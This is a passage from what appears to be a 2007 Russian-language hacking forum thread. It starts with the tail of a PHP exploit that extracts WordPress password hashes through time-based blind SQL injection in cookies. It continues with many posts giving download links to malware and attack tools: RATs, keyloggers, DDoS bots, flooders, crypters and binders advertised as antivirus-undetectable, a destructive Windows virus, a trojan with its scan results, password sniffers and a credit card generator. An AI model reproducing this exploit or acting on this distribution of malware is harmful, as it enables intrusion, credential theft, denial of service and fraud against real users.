$mean_delayed = intval(($sa + $sb + $sc) / 3);
echo "mean delayed - $mean_delayed dsecs
";
return $mean_delayed;
}
///////////////////////////////////////////////////////////////////////
function test_md5delay($cnt)
{
global $url, $id, $prefix, $suffix;
// delay in deciseconds
$delay = -1;
$ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
$ipattern = ' UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(LENGTH(user_pass)>31,BENCHMARK(%d,MD5(1337)),3)/*';
$inj = sprintf($ipattern, $prefix, $id, $cnt);
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$start = getmicrotime();
$buff = make_post($url, $post);
$end = getmicrotime();
if(intval($buff) !== -1)
{
die("test_md5delay($cnt) - invalid return value, exiting ...");
}
$diff = $end - $start;
$delay = intval($diff * 10);
return $delay;
}
///////////////////////////////////////////////////////////////////////
function getmicrotime()
{
list($usec, $sec) = explode(" ", microtime());
return ((float)$usec + (float)$sec);
}
///////////////////////////////////////////////////////////////////////
function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = FALSE)
{
$ch = curl_init();
$timeout = 120;
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)');
if(!empty($cookie))
{
curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
}
if(!empty($referer))
{
curl_setopt ($ch, CURLOPT_REFERER, $referer);
}
if($headers === TRUE)
{
curl_setopt ($ch, CURLOPT_HEADER, TRUE);
}
else
{
curl_setopt ($ch, CURLOPT_HEADER, FALSE);
}
$fc = curl_exec($ch);
curl_close($ch);
return $fc;
}
///////////////////////////////////////////////////////////////////////
function add_line($buf)
{
global $outfile;
$buf .= "
";
$fh = fopen($outfile, 'ab');
fwrite($fh, $buf);
fclose($fh);
}
///////////////////////////////////////////////////////////////////////
?>
Автор: неузнаваемый 25.05.2007, 00:31
Illusion Ddos bot 1.1
В архиве: хелп, ридми, крякнутый билдер, некрякнутый билдер (во вложеном архиве), пустой сервер бота.

Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.
http://damagelab.org
Статья по настройке http://team-madalf.com/index.php?showtopic=42612&view=getnewpost
пасс
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.
Автор: Gener 28.05.2007, 19:13
Немного софта от KD-Team
- Java Bind Shell
A example that shells are also possible with java.
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.
- BannerGrabberLittle application to grab a banner from a port
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.
- Brute MySqlA little application to bruteforce MySql passwords. You need to put the jar from mysql.com in your JRE lib\ext directory or link it at runtime.
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.
- KernelMode SnifferNothing fancy just a working example of the code in the latest rootkit.com book. You can use this framework to make nifty things to capture info.
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.
- MySQL Shell'sExample sourcecode to execute commands on MySQL or have reverse or bindhsell. You need the MySQL libs and header file to compile some of this code.
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.
- SniffDoor
Userland Backdoor classes. It sniffs,matches word,spawns reverse shell. Works on tcp,udp,icmp. Nothing fancy just some handy code.
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.
- Connect Back ShellSimple connect back shell. just to show how it works nothing fancy.
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.
Автор: Creeping Death 29.05.2007, 13:58
Yahoo Fake
http://rs108.rapidshare.com/files/33901066/fakeyahoo.rar
SHA-1 Cracker
http://rapidshare.com/files/33552570/SHA-1_Cracker.rar
Hippi virus
Virii.exe Summary :
-Modifies registry so that the user can't run
any exe, bat, ini, inf, reg files anymore ..
-Disables ALL exe's on computer including regedit, cmd, ...
-Deletes restore settings
-Modifies files of LastKnownGood Configuration changes
SystemFolder & Windows folder so it will be much worse to
start with LastKnownGood configurations to repair virii
-Modifies usb mass storage drivers and usb driver to make sure
that the user can't backup his data, disables access to new
usb drivers
-Windows can't be reinstalled because it gives error
"rundll32.exe" can't be opened. HDD should be formatted first
to install windows.
-3KB, completely undetectable ...
Tested in WinXP Sp1 & Sp2
NE TESTAT
http://rapidshare.com/files/33923095/virii.exe.html
Автор: Creeping Death 29.05.2007, 17:48
RapidShare Pack
* Bypass 1 hour limit
* Cred!t C@rd Generator2007
* RS Grabber 1.4.8
* No 1 proxy
* Rapidown 5.9
* RS Money
* Rapidsharecom Hack
* RsGetPoints 233
* USDownloader 21.4
* Rapidshare Premium Account
Bonus:
* Megaupload Hack
* Megaupload Premium
* Lifetime Premium
* More....
http://rapidshare.com/files/34025578/RapidShare_Pack_2007_may.rar
Автор: Creeping Death 31.05.2007, 20:52
Google Hacker 1.2
Небольшая софтинка упростит нашу задачу. теперь не придется в n-ый раз за вечер, общаться с гуглем. она все сделает на вас=)
http://rapidshare.com/files/34419081/Google_Hacker_1.2.rar.html
SuperScan
is a powerful TCP port scanner, pinger and hostname resolver.
/*впринципе, ничего особенного*/
http://rapidshare.com/files/34425920/superscan.rar.html
yahooUltraCracker
Powered By ArvinHacker =))
http://rapidshare.com/files/34425613/yahooUltraCracker.rar.html
Craven's Spam a Forum
довольно-таки шустрый и удобный
http://rapidshare.com/files/34425480/UC.Forum_Spam.rar.html
Pure phpBB emali Extractor
http://rapidshare.com/files/34425252/phpBB-Hack-Pack-ver1_1_.0.rar.html
phpBBcracker
http://rapidshare.com/files/34425117/phpBBcracker.rar.html
phpbb attack
2.x
http://rapidshare.com/files/34424959/phpbb_attack.rar.html
Php Nuke Hacker v11.0
учим турецкий. проста до безобразия.
http://rapidshare.com/files/34424795/Php_Nuke_Hacker_v11.0.rar.html
DoS 5.0
http://rapidshare.com/files/34420631/DoS_5.0.rar.html
Astaroth
http://rapidshare.com/files/34420176/Astaroth.rar.html
E-mail_Cracker
http://rapidshare.com/files/34418977/E-mail_Cracker.rar.html
MSN Messenger Account Cracker v2.0
http://rapidshare.com/files/34418007/MSN_Messenger_Account_Cracker_v2.0.rar.html
Slh 3.0 RAT
Thx to santasdad
http://rapidshare.com/files/34407835/s3.rar
cgi scanner
http://rapidshare.com/files/34418669/cgis4.rar.html
Автор: Creeping Death 11.06.2007, 09:17
CryptX 1.0 Public
Date: 4/20/2007
Platforms: All Windows Platforms
Undetectable as of 4/20/2007.
-RAR Password-
cryptX
NOTE: For each crypted file, the crypted file will copy itself
to the index directory (Where you launched CryptX from, and will save it
as crypted.exe) You'll need to put that file into a new file location.
NOTE: When CryptX is unloaded, it'll cause an invalid window call, just
click Cancel or No, on debug, and everything is saucy.
::Disclaimer::
In no way am I responsible for any unethical/illegal useages of CryptX! Please use this CryptX was made for educational purposes only. Please use this at your own risk.
::How it works?::
CryptX adds false code by Denoted bits of data to the PE Header and Entry point, thus confusing anti-virus hueristics. on randmomized 33555.59 Data variation. (the more you crypt the binary, the more different the outcome will be)
Some notes: After you've crypted the binary you may find it useful to pack it with a PE Packer. I recommend MEW 11, as being the most reliable and effective for packing distributable binaries. Please use this at your own risk, as I am not responsible for any damage or data loss using CryptX.
Enjoy CryptX!
Undetectable Status
FUNCTIONALITY AND STABLIZATION AFTER
CRYPTED MAY VARY, AND DEPENDING ON EACH VARIANT MAYBE
DIFFERENT FROM ANOTHER. I CRYPTED ONE OF EACH OF THE FOLLOWING
TROJANS, THEREFOR I AM JUST MAKING A "LOGICAL" GUESS THAT IT WILL
MAKE THE OTHER VARIATIONS THE SAME.]
MoSucker - all variations.
SubSeven - all variations.
C.I.A - all variations.
Net Devil - all variations.
Optix Pro - all variations.
DoS 5.5 - all variations.
Assorted Virii, worms, et cetera
effectivelly made undetected by
CryptX 1.0
If you crypt MyDoom, or some other serious shit,
don't be dumb, and re-populate it. Thanks.
http://rapidshare.com/files/36417385/CryptX_1.0.rar
MicroJoiner v1.7
http://rapidshare.com/files/36418044/mj17.zip
Chimera
автор: Kuzya
При запуске chimera прописывает себя в реестре и открывает на 10000 порту фтп сервер.
Небольшая особенность здесь в том, что бродя по папкам заражённого компа
Вы всегда будете видеть дополнительные папки с именами имеющихся дисков - то есть
из любой директории любого диска Вы можете попасть в корень другого диска.
Трой написан на делфи 6. Весит 176кб. На момент публикации антивирусами не палится.
Единственная известная пока бага: если заражённый имеет несколько IP-адресов то
к фтп серверу можно подключится только через один IP из этих нескольких.
Автор: Creeping Death 11.06.2007, 11:51
http://www60.megaupload.com/files/1deb8067d68605a465dfa87b0bbef862/ExploitSQL.rar
Автор: Creeping Death 12.06.2007, 00:21
DHC-Hacking-Toolz
1. Ddoz Toolz
2. SQL Injection
3. CC [ Credit Card ]
4. IRC Attacking
5. Google Hacker
6. RapidShare Hack
http://rapidshare.com/files/36519048/DHC-Hacking-Toolz__AIO_.rar
SubSeven 2.1 gold edition
http://rapidshare.com/files/36507346/s21gold.zip.html
prorat v2.0
http://rapidshare.com/files/36530704/ProRatv2.0.rar.html
Wireless Hack Toolz
Kismet-2005-08-R
NetStumbler-0.4.0
Wellenreiter-v1.9
WEPcrack 0.1.0
airsnort-0.2.7e
wepwedgie-0.1.0-alpha
Hotspotter-0.4
Advanced Bash-Scripting Guide
Bash Guide for Beginners
The Linux Network Administrator's Guide, Second Edition
http://rapidshare.com/files/36519722/AIO_Wireless_Hack_Toolz.rar
Автор: Creeping Death 12.06.2007, 12:53
nBinder 5.1
http://rapidshare.com/files/36648901/nbinder_setup.rar
Advanced Invisible Keylogger v1.8 + Crack
http://rapidshare.com/files/36650292/Advanced_Invisible_Keylogger_v1.8.rar
Автор: Creeping Death 13.06.2007, 13:27
PHP Injection Scanner
http://rs124.rapidshare.com/files/36771817/Php_Injection_Scanner-mr.jack.rar
Автор: Creeping Death 13.06.2007, 19:16
Undetector v.1.2
http://rapidshare.com/files/36984051/Undetector_1.2.rar
Автор: Creeping Death 13.06.2007, 20:05
ProxyFuzz
ProxyFuzz is a man-in-the-middle non-deterministic network fuzzer written in Python. ProxyFuzz randomly changes (fuzzes) contents on the network traffic. It supports TCP and UDP protocols and can also be configured to fuzz only one side of the communication. ProxyFuzz is protocol agnostic so it can randomly fuzz any network communication.
ProxyFuzz is a good tool for quickly testing network protocols and provide with basic proof of concepts. Using this tool you will be amazed by the poor quality of software and you will see clients and servers dying upon unexpected input, just be prepared to see the very weird behaviours.
Syntax of ProxyFuzz:
ProxyFuzz 0.1, Simple fuzzing proxy by Rodrigo Marcos
usage():
python proxyfuzz -l <localport> -r <remotehost> -p <remoteport> [options]
[options]
-w: Number of requests to send before start fuzzing
-c: Fuzz only client side (both otherwise)
-s: Fuzz only server side (both otherwise)
-u: UDP protocol (otherwise TCP is used)
-v: Verbose (outputs network traffic)
-h: Help page
http://theartoffuzzing.com/downloads/proxyfuzz/proxyfuzz.py
http://theartoffuzzing.com/downloads/proxyfuzz/proxyfuzz.zip
Wfuzz - The web bruteforcer
Wfuzz is a tool designed for bruteforcing Web Applications, it can be used for finding resources not linked (directories, servlets, scripts, etc), bruteforce GET and POST parameters for checking different kind of injections (SQL, XSS, LDAP,etc), bruteforce Forms parameters (User/Password), Fuzzing,etc.
It's very flexible, here are some functionalities:
* -Recursion (When doing directory bruteforce)
* -Post data bruteforcing
* -Output to HTML (easy for just clicking the links and checking the page, even with postdata!!)
* -Colored output on all systems 
* -Hide results by return code, word numbers, line numbers, etc.
* -Url encoding
* -Cookies
* -Multithreading
* -Proxy support
* -All parameters bruteforcing (POST and GET)
* -Dictionaries tailored for known applications (Weblogic, Iplanet, Tomcat, Domino, Oracle 9i,
Vignette, Coldfusion and many more. (All dictionaries are from Darkraver's Dirb, www.open-labs.org)
http://www.edge-security.com/soft/wfuzz-11.zip
http://www.edge-security.com/soft/wfuzz-1.1.tar.gz
Автор: Creeping Death 13.06.2007, 20:10
AWexploder 1.3
AWexploder helps you to find virtual hosts for a given IP address and looks for a CMS in each virtual host. In this version it looks for OpenSourceCMS's. More cms's will be added in later verions.
http://www.edge-security.com/soft/AWexploder.tar
Автор: Creeping Death 16.06.2007, 10:16
Hackers Fantastic KIT
CrackersKit 2005
Golden eye 2005
HellLabs Proxy Checker v7.4.18
HostScan v1.6.5.531
Invisible Browsing v4.0
IPScanner v1.86
Ascii Factory 0.6
Cool Beans NFO Creator v2.0.1.3
Dizzy v1.10
Feuer's NFO File Maker v2.0
Ims NFO&DIZ Maker 1.87
Inserter v1.12
NFO Creator v3.5.2
NFO Maker 1.0
Patchs All In One 2005
SoftIce 4.05 -Win 2000-XP
IP Address Scanner
IP Calculator
IP Converter
Port Listener
Port Scanner April 2005
Ping
NetStat 2005
Cool Trace Route 2005
TCP/IP Configuration
Online - Offline Checker
Resolve Host & IP
Time Sync
Whois & MX Lookup
Connect0r
Connection Analysator and prtotector
Net Sender April 2005
E-mail seeker
Cool Net Pager
Active and Passive port scanner
Spoofer
Hack Trapper
HTTP flooder (DoS)
Mass Website Visiter
Advanced Port Scanner
Trojan Hunter Multi IP April 2005
Port Connecter Tool
Advanced Spoofer
Cool Advanced Anonymous E-mailer April 2005
Simple Anonymous E-mailer
Anonymous E-mailer with Attachment Support
Mass E-mailer
E-mail Bomber
E-mail Spoofer
Simple Port Scanner (fast)
Advanced Netstat Monitoring
X Pinger
Web Page Scanner
Cool Fast Port Scanner
Deep Port Scanner
Fastest Host Scanner (UDP)
Get Header
Open Port Scanner
Multi Port Scanner
HTTP scanner (Open port 80 subnet scanner)
Multi Ping for Cisco Routers
TCP Packet Sniffer
UDP flooder
Cool Resolve and Ping
Multi IP ping
File Dependency Sniffer
EXE-joiner
Encrypter
Advanced Encryption
File Difference Engine
File Comparasion
Mass File Renamer
Add Bytes to EXE
5Cool Cool Variable Encryption
59) Simple File Encryption
60) ASCII to Binary
Enigma
Password Unmasker
Credit Card Number Validate and generate
Create Local HTTP Server
eXtreme UDP Flooder
Web Server Scanner
Force Reboot
Cool Webpage Info Seeker
Bouncer
Advanced Packet Sniffer
IRC server creater
Connection Tester
Fake Mail Sender
Bandwidth Monitor
Remote Desktop Protocol Scanner
MX Query
Messenger Packet Sniffer
Cool API Spy
DHCP Restart
File Merger
E-mail Extractor (crawler / harvester bot)
Open FTP Scanner
Fast Patch
Predator's Extreme Loader Generator 0.3
Srlzer - Patch generator
Yoda's Process Patcher
Buddha Patch File Creator 2.2
CodeFusion
Cool Beans NFO Creator 2.0.1 build 3
Patch Creation Wizard v1.2
Patch On The Fly v0.75
Rlzer
RTD - WINpatch v1.0
Tola's Patching Engine
Analysis :
OllyDbg 1.10
W32Dasm 8.93 /w patch
PEiD 0.92
Rebuilding :
ImpRec 1.6
Revirgin 1.3
LordPE RoyalITS
Packers :
FSG 2.0
MEW 11 1.2 SE
UPX 1.25
Patchers :
dUP 1.11
CodeFusion 3.0
Universal Patcher Pro 2.0
aPatch 1.07 (*New)
PMaker 1.1.0.0 (*New)
Tola's Patch Engine 2.03b (*Nuevo)
ABEL Loader 2.31 (*Nuevo)
HEX Editor :
BView 5.6.2
Decompilers :
DeDe 3.50.04
Flasm
Unpackers :
Alot! ( ASProtect, ACProtect etc )
Others :
FileMon
RegMon
RSATool 2
d*mn HashCalc
Krugers ToolBox
EVACleaner 2.7 (*New)
Process Explorer (*New)
Resource Hacker (*New)
PUPE 2002 (*New)
http://forum.hack-elite.com/board/tools/part1.zip
http://forum.hack-elite.com/board/tools/part2.zip
Автор: Creeping Death 16.06.2007, 10:39
Naked Packer 1.0
http://rapidshare.com/files/37434760/nakedpack.rar
Автор: Creeping Death 16.06.2007, 14:37
UnDo Crypter
UnDo Crypter Public Version
* Currently Undetectable from all AntiVirus
* Stub size is 4.50kb packed with UPX
* has a small compression ratio for unpacked files
bifrost server example 28.3kb / 32.8kb crypted
source code and private versions are for sale (contact i.am.noble.com@gmail.com for details)
http://rapidshare.com/files/37486192/UnDo_Crypter.rar
SharK 2.1.2&2.1.3
sharK is an advanced remote administration tool written in VB6. With sharK you will be able to administrate every PC in the world (using Windows OS) remotely. Here are some facts:
* sharK uses RC4 to encrypt the traffic
* sharK is able to resume downloads and uploads when the server disconnects on the next connect
* Compressed Transfers
* Thumbnail Previews of Pictures
* Keylogger works with Keyboard hooking
* You have a real DOS-Shell instead of dos-output like in the most rats
* Interactive Process Blacklist
* Virtual-Machine detection
* Double-Compression in Screencap & Webcam-Capture
And much much more. SharK is designed for professional remote administration, so you don’t have colourfull buttons etc and can enjoy lot’s of rightclick-menus and hotkeys and stuff like histograms.
- - - - - - - - - - - - - - - - - - - - - - - -
in 2.1.3
+ = New Feature
* = Bugfix
[+] You can show additional informations like AV/FW/Webcam/Browser in the SIN Console
[+] Raring Folders possible
[+] Broadcast-Download Possible
[*] Client didn't show interval correctly when loading settings
[*] Client doesn't show up the versionnumber twice in systray
[+] Menuitems can be collapsed automaticially
[*] Put zlib.dll inside the archive so screencap works for all Razz
[*] Group-Functions had big bug
http://rapidshare.com/files/37492616/sharK_212.rar
http://rapidshare.com/files/38078471/sharK_2.1.3.rar
Автор: Creeping Death 18.06.2007, 10:56
Pack Hack
-MailerX = You can spam with email! (it contains an smtp server)
-PHP Attacker = is a program that allow you to run exploitz on a website.(php)
-PhpNuke = Is a program that allows you to make sql injection on phpnuke sites (IT WORKS IS AWESOME)
-PHP-Nuke_Hacker = is a program that allow you to run exploitz on any website finding exploits from www.milw0rm.com
-IFRAME_DDoS_v1[1].0= You can flood a website with multiple connections
-Reuploaded=is a webnuker for websites! (it works great)
-ICMP DoS=You can flood a website
-IP_Hider_v2[1].7_-xray-=Is a good one for hiding you ip..(i am using it)
-PP-checker=Paypal checker to hack paypal accounts
-BrutusAET2 Host by HybriD3_2= one of best bruteforces ever
-evilsmiley= an .exe file that an evil face with an evil smiley appears on your monitor and u cant do anything ( a funny one )
-CSF-(c-sploiter final)= i will let you to check this out alone 
-AntiDote_v1[1].2_osCE=To make a trojan undetected!
-Nudge_Madness=basicly is an autoclicker
-msn-nudger=it spams your contacts with nudges
-YouTUBE_downloader_2.1.1=you can download the videos on youtube with this program
-MEssBlackFrezzerBeta=You can freeze someone's account on msn
-bugs.txt= a text file that contains different bugs like a site could have...
-sploof_v0.90.installer= a program to try a website's security....
-proxylist.txt = contains proxies
-proxies.txt= contains proxies
-ipsteales = is a shell that helps you to steal someone's ip
- - - - - -
ИМХО,3-, но может кому-нибудь пригодится;)
http://rapidshare.com/files/37798225/pack.rar
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после того, как наберете 100 сообщений.
Автор: Creeping Death 18.06.2007, 16:09
Aw&Firewall Killer v1.0 Release
http://rs11.rapidshare.com/files/20314776/S.E.T_Aw-Firewall_Killer_v1.0.rar
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после того, как наберете 100 сообщений.
Автор: Creeping Death 19.06.2007, 12:26
Mirkov4 v1.1
Mirkov4, a remote administration tool over http. It currently features desktop interaction (ala VNC), naviguation through the computer drives, download/upload/removal of files, execution of commands and a display of current running processes.
проверено под Win2003 with NOD32.
коннект- через брауз http://ip_vitima:7887
http://www.hacker-soft.net/down.php?id=2437&url=1
DalKrypt 1.0
http://rapidshare.com/files/38077832/DalKrypt_1.0.rar
Slh 4.0
+new file transfer manager pause/resume your transfers hopefully more stable
~server updates new identication imediatly
~changed compression engine (smaller server)
-removed registry editor and plugins will add again soon (improving)
~server 90% re-write
+most data compressed between client and server compressed
+HKLM and HKCU startup methods re-added
+ability to change mutex name
+added option to direct connect - still very usefull
~improved transfers stabilty
~persistance option improved
~socket connections improved
~changed stupid two letter varibales
main window
~show extension version outdated extension version showed in red.
+added dockable windows for connections,transfers + windows
system information
+added %IDLETIME% varibale get time away from keyboard + mouse
file manager
+drag drop files to upload
+goto folder with links for most folders
screen cap
+speed improved Ura
+change image bitcount when using bitmap
webcam
+option to select webcam driver
keylogger
+online key logger
other lil things
+added option to auto upload extension
~bold group names optional
+added skin support - not yet implemented
http://rapidshare.com/files/38079500/Slh_4.0.rar
Автор: Creeping Death 21.06.2007, 20:38
The Punisher Trojan
Antivirus Version Update Result
AhnLab-V3 2007.6.20.1 06.20.2007 no virus found
AntiVir 7.4.0.34 06.20.2007 no virus found
Authentium 4.93.8 06.19.2007 no virus found
Avast 4.7.997.0 06.20.2007 no virus found
AVG 7.5.0.467 06.19.2007 no virus found
BitDefender 7.2 06.20.2007 Generic.Malware.SDbTk.997E24F1
CAT-QuickHeal 9.00 06.19.2007 no virus found
ClamAV devel-20070416 06.20.2007 no virus found
DrWeb 4.33 06.20.2007 WIN.SCRIPT.Virus
eSafe 7.0.15.0 06.19.2007 no virus found
eTrust-Vet 30.7.3727 06.19.2007 no virus found
Ewido 4.0 06.20.2007 no virus found
FileAdvisor 1 06.20.2007 no virus found
Fortinet 2.91.0.0 06.20.2007 no virus found
F-Prot 4.3.2.48 06.19.2007 no virus found
F-Secure 6.70.13030.0 06.20.2007 Backdoor.Win32.VB.gen
Ikarus T3.1.1.8 06.20.2007 no virus found
Kaspersky 4.0.2.24 06.20.2007 Backdoor.Win32.VB.gen
McAfee 5056 06.19.2007 VB-BackDoor.a.gen
Microsoft 1.2607 06.20.2007 no virus found
NOD32v2 2341 06.20.2007 probably unknown NewHeur_PE virus
Norman 5.80.02 06.20.2007 no virus found
Panda 9.0.0.4 06.20.2007 no virus found
Prevx1 V2 06.20.2007 no virus found
Sophos 4.18.0 06.12.2007 Mal/VB-F
Sunbelt 2.2.907.0 06.09.2007 no virus found
Symantec 10 06.20.2007 no virus found
TheHacker 6.1.6.136 06.20.2007 no virus found
VBA32 3.12.0.2 06.20.2007 no virus found
VirusBuster 4.3.23:9 06.19.2007 no virus found
Webwasher-Gateway 6.0.1 06.20.2007 no virus found
When the victim open server.exe this will close automatically windows firewall ,nod32 ,sygate firewall ,disable task manager
Server copy: C:\WINDOWS\system32\Svchost32.exe
Trojan Name: The Punisher Trojan
Server size:294 KB
Client Size:1,45 MB
Coded In : Visual Basic
Author:E.M.I.N.E.M
http://rapidshare.com/files/38467233/The_Punisher_Trojan.rar.html
http://www.g0t-filez.net/472263
Автор: Creeping Death 22.06.2007, 16:20
Some Hack Tools(pack)
-DoS Attacker
-Ftpbrut
-FTPBruter
-Ip Scaner
-Ip Nuker
-Xp killer
-EliteKeylogger v1.0
-LogIT v1.0
-LttLogger v2.0
-SCKeyLog v 2.24
-Bitfrost v 1.102
-ColdFusion v1.2
-ProRavt v1.9
-ToquitoBandito v 5h17
-ToxiBackDoor
-BlackCobra Downloader
-ToxiWebdl v1.1
http://rapidshare.com/files/38667356/Hack_tools.rar
Автор: Creeping Death 23.06.2007, 12:06
[AIO] PassWord Sniffer
MessenPass
Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
Mail PassView
Recovers the passwords of the following email programs: Outlook Express, Mcft Outlook 2000 (POP3 and SMTP Accounts only), Mcft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.
Protected Storage PassView
Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more...
Dialupass
Password recovery tool that reveals all passwords stored in dial-up entries. (Internet and VPN connections) As opposed to many other tools, this tool works in all versions of Windows, including Windows 2000 and Windows XP.
Asterisk Logger
Recovers passwords stored behind asterisks (****) characters. You can use this tool to recover the passwords of many applications, like CuteFTP, CoffeeCup Free FTP, VNC, and more...
Network Password Recovery
Recover network passwords stored by Windows XP operating system.
SniffPass Password Sniffer
Capture the passwords that pass through your network adapter, and display them on the screen instantly.
You can use this utility to recover lost Web/FTP/Email passwords.
http://rapidshare.com/files/38772211/PWSniff.rar
Автор: Creeping Death 23.06.2007, 15:58
SBinder
http://rapidshare.com/files/38847479/SBinder.zip
Vulnerability Scanners Pack
+CGI Founder
+Cgi Scanner 4
+LanSpy
+Libwhisker 2.3
+Nikto
+NStealth HTTP Security Scanner 5.8 Free
+Retina - For Windows NT
+Shadow Security Scanner 7.84
+THC-Amap Version 5.2
+VoidEYE CGI Scanner
+Web Check
http://rapidshare.com/files/38849020/Vulnerabilty_Scanners.rar
Password Decrypters Pack
-Access Driver
-Brutus-AEt2
-Cain and Abel 4.2
-FileZilla PWDump 0.1
-ForceSQL
-John The Ripper 1.7.1 Win
-KMd5 1.03b
-LC3
-MailForce2.4
-MD5 (Linux)
-MD5 Backup (Linux)
-MD5 GUI
-MD5 Toolbox 1.0
-MD5brute 1.0
-Passware 5.0 + Serial
-POP3 BruteForcer
-Sam Decrypt
-Unsecurev1.2
-VNCrack (Linux) 1.21
-VNCrack (Win32) 1.21
http://rapidshare.com/files/38850477/Password_Decrypters.rar
Packers, Crypters and Protectors Pack
-AREA 51 Cryptor
-ASPack 2.12
-AZProtect
-Cexe (NT Only)
-Diet
-Enigma Protector 1.16
-exe32pack
-ExE Evil v1.0
-EXESmasher 1.0
-FSG v1.33.zip
-FSG v2.0
-ICrypt 1.0
-IProtect
-Krypton v0.3
-Lzexe1.00a
-Mew 11 SE v1.2
-MoleBox 2.6.1
-Morphine v1.9
-Mr. Undectetable
-NeoLite v2.0
-nPack 1.1.300
-NsPack v3.4 Full Cracked
-NT Packer
-Pack 1.0
-Packman 1.0
-PECompact v2.64 Full
-PEncrypt 4.0
-PEPack 1.0
-Petite 2.2
-Pex 0.99
-Phantom
-PKLite32 1.0
-Private EXE Protector 2.0
-RAT Packer
-RLPack 1.16 Basic Edition
-RLPack 1.17 Personal Edition
-Scramble Tool v0.2.2 rc1
-SDC 1.2
-shrnkEXE
-Stud v1.0 Crypter.
-tElock 0.98
-Underground Crypter 1.0
-UPX v2.02
-UPX Crypt
-Wind Of Crypt 1.0
-WinLite
-WWPACK 3.05
-Yoda's Crypter v1.3
http://rapidshare.com/files/38851879/Packers__Crypters_and_Protectors.rar
Nukers and Flooders Pack
-AdonAi v0.1 FTP DDoS
-AntiRUS 3.0
-Assault
-Battle Pong
-Click 2.2
-Death n Destruction DoS
-Denyo Launch Flooder
-DoS Attacker
-DoSTool
-Ether Flood
-Evil IGMP
-F-ed Up
-Fortune
-FreeSite Killer 2.01
-Hospitables Nuke 2.23
-Http Bomber v1.001b
-Hybrid Flood 2
-ICMP Flood
-IGMP
-Inferno
-IPT
-kod
-Nuke'em
-NuKe.zip
-PacketStorm 1.3
-Panther Mode2
-phpBBAttacker
-phpBB DoS
-Ping Attack
-RCP Nuke
-Rocket 1.0
-Site NuKe
-Sprut
-TheRapist
-UC Forum Spam
-Vai Tu J Nuker
-Voob
-VZM Nuker
-Web Attacker ENG
-Web X Grabber
http://rapidshare.com/files/38854169/Nukers_and_Flooders.rar
Binders Pack
-AFX Executable Binder PRO
-Amok Joiner
-Asylum Binder
-Binder
-BlackCore File Binder
-Blade Stoner 1.5
-BTS Binder
-Crucified 1.2
-Djoiner 1.3
-Deception v4.0
-Droopy Binder 1.0
-EES Binder 1.0
-exe,jpg,doc File Binder
-Exebinder v2.5
-F.B.I
-File Injector v3
-Fresh Bind
-Freshbind v2.01
-Frusion v1.0
-HelioS Binder v1.0c
-Hook Toolbox
-IDE Spinner
-Inbinder v1.0
-Interlaced II v1.00
-J-BiNdEr
-M3Byter
-MBinder
-Multi Binder 1.4.1
-MVM v1.0
-NakedBind v1.0
-Newjoin
-NG Binder Pro
-Nightwolf Binder 1.0 Alpha
-OverDoz 2
-Pretator v1.6
-Reductor 1.0b (Beta 4)
-Rephlex Binder 0.2
-SCD 1.0
-Silk Rope v2.0 (Binaries and Source)
-ToP GUI Full 2.0
-Trendy Nigger 1.0b
-X-Exe Joiner
-YAB (Yet Another Binder)
http://rapidshare.com/files/38856990/Binders.rar
Keyloggers Pack
-Activity Keylogger v1.0
-Advanced Invisible Keylogger 1.5 Full
-Aplus
-Barok 1.0
-Chota
-Computer Spy
-Curiosity
-CYBERSHOK 1.0 Private
-DK2Full
-ehks 2.2
-Elite Keylogger 1.0
-EyeSpy
-Fearless Key Spy 2.0
-FSK 2.0
-KeyLog 2.5
-Keylogger
-KGB KeySpy 2.0 Private Xmas Edition
-Metakodix Stealth Keylogger 1.1.0 Cracked
-MSGate 0.1
-Phantom 2
-Phoenix
-Power Spy 5.5.2
-Project Satan 1.1
-RemoteLogger v1.0
-SC-KeyLog 2
-SKL 0.1
-skl0g
-Spy
-Spytector 1.3.1
-Tong KeyLogger
-YSK KeyLog
http://rapidshare.com/files/38855413/Keyloggers.rar
Автор: Creeping Death 23.06.2007, 20:23
Surrogafier 1.0-rc3
Surrogafier is an easy to install three tier web proxy written in PHP. It is free to use and distribute under the GNU General Public License (GPL). A demo install of Surrogafier can be found here.
